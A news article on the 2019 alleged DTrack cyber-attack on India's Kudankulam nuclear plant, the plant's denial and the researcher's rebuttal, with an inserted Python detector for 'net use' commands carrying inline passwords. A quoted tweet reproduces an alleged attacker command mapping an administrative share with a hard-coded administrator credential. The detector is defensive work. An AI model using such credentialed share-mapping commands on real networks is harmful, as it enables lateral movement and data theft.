Kudankulam Nuclear Power Plant has denied rumours that the facility had come under cyber-attack. A statement issued by the Training Superintendent and Information Officer R Ramdoss said that some false information is being propagated on social media platforms, electronic media and print media.
Rumours of a cyber-attack on the Kudankulam Nuclear Power Plant spread on social media after cybersecurity expert Pukhraj Singh made the allegation. He tweeted that attackers had gained domain controller-level access at the Nuclear Power Plant, and that extremely mission-critical targets were hit in the attack.
So, it’s public now. Domain controller-level access at Kudankulam Nuclear Power Plant. The government was notified way back. Extremely mission-critical targets were hit. https://t.co/rFaTeOsZrw pic.twitter.com/OMVvMwizSi
— Pukhraj Singh (@RungRage) October 28, 2019
Pukhraj Singh, who had played an instrumental role in setting up the National Technical Research Organisation, the technical intelligence agency of India, said that a third party had detected the unauthorised intrusion and contacted him about it. He said that he, in turn, informed the National Cyber Security Coordinator about the attack on September 4th. Singh said that the incident was later reported by cybersecurity and anti-virus provider Kaspersky, which called the malware DTrack.
An unnamed cybersecurity expert and Twitter user posted logs of data allegedly mined during the attack.
Interesting potential DTRACK (CC @Mao_Ware )
Dumps the data mined output via manually mapped share over SMB to RFC1918 address with a statically encoded user/pass:
> net use \\10.38.1.35\C$ su.controller5kk /user:KKNPP\administrator
— く̱͕̘͚ず̡̭̠ (@a_tweeter_user) October 28, 2019
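The tweet above points at a recognisable pattern: a share mapped with `net use` and the password passed on the command line, which leaves the credential in process-creation telemetry. The following is an added detection example, not code from the article, from the tweet's author or from Kaspersky. It parses `net use` command lines as an EDR or SIEM would expose them, flags any that carry an inline password, and raises the severity when the target is an administrative share, the built-in administrator account, or a private (RFC 1918) address. The sample records are constructed for the demonstration; the destination addresses, hostnames and passwords in them are placeholders, not values from the incident.

```python
"""Flag 'net use' invocations that embed a password on the command line.

Added example (not from the article or from Kaspersky): scans process-creation
records, as a SIEM or EDR would expose them, for SMB share mappings that carry
an inline password, the pattern described in the quoted tweet. The sample
records below are constructed for the demonstration.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

ADMIN_SHARES = {"c$", "admin$", "ipc$"}     # Windows administrative shares
DRIVE_RE = re.compile(r"^[A-Za-z]:$")       # optional drive letter, e.g. "Z:"


@dataclass
class NetUseMapping:
    host: str
    share: str
    user: Optional[str]
    password: Optional[str]   # None when no password was passed inline


def parse_net_use(cmdline: str) -> Optional[NetUseMapping]:
    """Return the mapping a 'net use \\\\host\\share ...' command creates, or None."""
    tokens = cmdline.split()
    for i in range(len(tokens) - 1):
        if tokens[i].lower() in ("net", "net.exe") and tokens[i + 1].lower() == "use":
            args = tokens[i + 2:]
            break
    else:
        return None                      # not a 'net use' invocation
    if args and DRIVE_RE.match(args[0]):
        args = args[1:]                  # skip the drive letter
    if not args or not args[0].startswith("\\\\"):
        return None                      # no UNC path, e.g. 'net use' listing mappings
    host, _, share = args[0][2:].partition("\\")
    user = password = None
    for tok in args[1:]:
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
        elif tok.startswith("/") or tok == "*":   # other switches; "*" means prompt for password
            continue
        elif password is None:
            password = tok               # first bare token is the inline password
    return NetUseMapping(host, share, user, password)


def is_private_ip(host: str) -> bool:
    """True for RFC 1918-style private addresses; hostnames return False."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def assess(record: dict) -> Optional[dict]:
    """Return a finding when the record's command line embeds an SMB credential."""
    m = parse_net_use(record["cmd"])
    if m is None or m.password is None:
        return None
    reasons = ["password passed inline on the command line"]
    if m.share.lower() in ADMIN_SHARES:
        reasons.append(f"administrative share {m.share}")
    if m.user and m.user.lower().rsplit("\\", 1)[-1] == "administrator":
        reasons.append("built-in administrator account")
    if is_private_ip(m.host):
        reasons.append("destination is a private (RFC 1918) address")
    severity = "high" if len(reasons) >= 3 else "medium"
    return {"host": record["host"], "dest": m.host, "share": m.share,
            "user": m.user, "severity": severity, "reasons": reasons}


# Constructed sample process-creation records (placeholders, not real telemetry).
SAMPLE_RECORDS = [
    {"ts": "2019-10-28T10:14:03Z", "host": "WS-07",
     "cmd": r"net use \\10.0.0.5\C$ Secr3t-example /user:CORP\administrator"},
    {"ts": "2019-10-28T10:15:10Z", "host": "WS-07",
     "cmd": r"net use Z: \\fileserver01\public /persistent:no"},
    {"ts": "2019-10-28T10:16:42Z", "host": "WS-12",
     "cmd": r"net.exe use \\192.168.1.20\IPC$ * /user:CORP\svc_backup"},
    {"ts": "2019-10-28T10:17:00Z", "host": "WS-12",
     "cmd": r"notepad.exe C:\temp\notes.txt"},
]


def scan(records=SAMPLE_RECORDS) -> List[dict]:
    """Run assess() over every record and keep the findings."""
    return [f for f in (assess(r) for r in records) if f]


if __name__ == "__main__":
    for f in scan():
        print(f"[{f['severity']}] {f['host']} -> \\\\{f['dest']}\\{f['share']} as {f['user']}: "
              + "; ".join(f["reasons"]))
```

Only the first constructed record is flagged: the drive-letter mapping carries no password, and the `IPC$` mapping uses `*`, which makes `net use` prompt for the password instead of taking it from the command line. In a real deployment the records would come from Sysmon event ID 1 or Windows event 4688 with command-line auditing enabled, and a hit on an administrative share with the built-in administrator account deserves a look at what was copied to that share.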
The logs show that the systems were infected with DTrack malware. According to Kaspersky, this is a remote access Trojan which has been targeting banks in India for over a year. It is a dual-use malware which can steal data as well as work as a cyberespionage tool. DTrack has been linked with North Korea’s Lazarus Group, a cybercrime group. According to the logs, the malware recorded keystrokes, local IP addresses, MAC addresses, operating system information, browser history, network configuration information, running processes, a listing of all files on all disks, etc., and sent the same to its creators.
Social media users quickly connected the reports of cyber-attack with a report this month saying that the second 1,000 MW nuclear power unit at Kudankulam had stopped operating. It was reported that the plant had stopped generating power due to “steam generation level low”.
Although the alleged log of the so-called cyber-attack shows data being stolen from the plant, it does not show any command being sent to disrupt operations. Therefore, the stopping of operations may not be linked to the attack, even if the attack had happened.
But the authorities have now denied all these speculations. The statement issued by the Kudankulam Nuclear Power Plant said that the control systems of KKNPP and other Indian nuclear power plants are stand-alone; they are not connected to any outside cyber network or the internet. Therefore, any cyber-attack on the plant is not possible. The statement also said that currently, KKNPP units 1 and 2 are operating at 1000 MWe and 600 MWe without any operational or safety concerns.
Reacting to the denial, Pukhraj Singh said that he had informed National Cyber Security Coordinator Lt Gen Rajesh Pant about the intrusion on September 4th. He said that follow-up emails were exchanged between them, and the issue was acknowledged by the authorities. Singh refused to divulge further details, citing privacy.
Seeing KKNPP’s press release, I would like to add that I notified Lt Gen Rajesh Pant (National Cyber Security Coordinator) on Sep 4. Follow-up emails were exchanged, acknowledging the issue. I would solicit no further enquiries on the matter, requesting privacy. https://t.co/SMdABbJcvQ
— Pukhraj Singh (@RungRage) October 29, 2019
Singh also clarified that it was the domain controller of KKNPP that was compromised, not the control system, and that the two are different systems.
Because of the security risk, control systems of nuclear power plants run on ‘air-gapped’ networks, which means the internal networks are not connected to outside networks or the Internet. Hence a direct cyber-attack on such plants over the Internet is not possible. But such attacks are possible if the systems are infected with malware introduced from inside the plant.
In the famous attack on the Iranian nuclear power station by the USA and Israel, the Stuxnet malware was introduced into the internal systems via a USB flash drive by a mole recruited by the CIA and Mossad; the plant was not attacked over the internet, as that was not possible. Stuxnet was a highly sophisticated malware which was deployed by a very high-level joint USA-Israel operation, with ground support from their respective spy agencies. The operation was also assisted by a few other European nations, including Germany and the Netherlands. It is not known whether North Korea possesses such capabilities to target Indian nuclear power plants.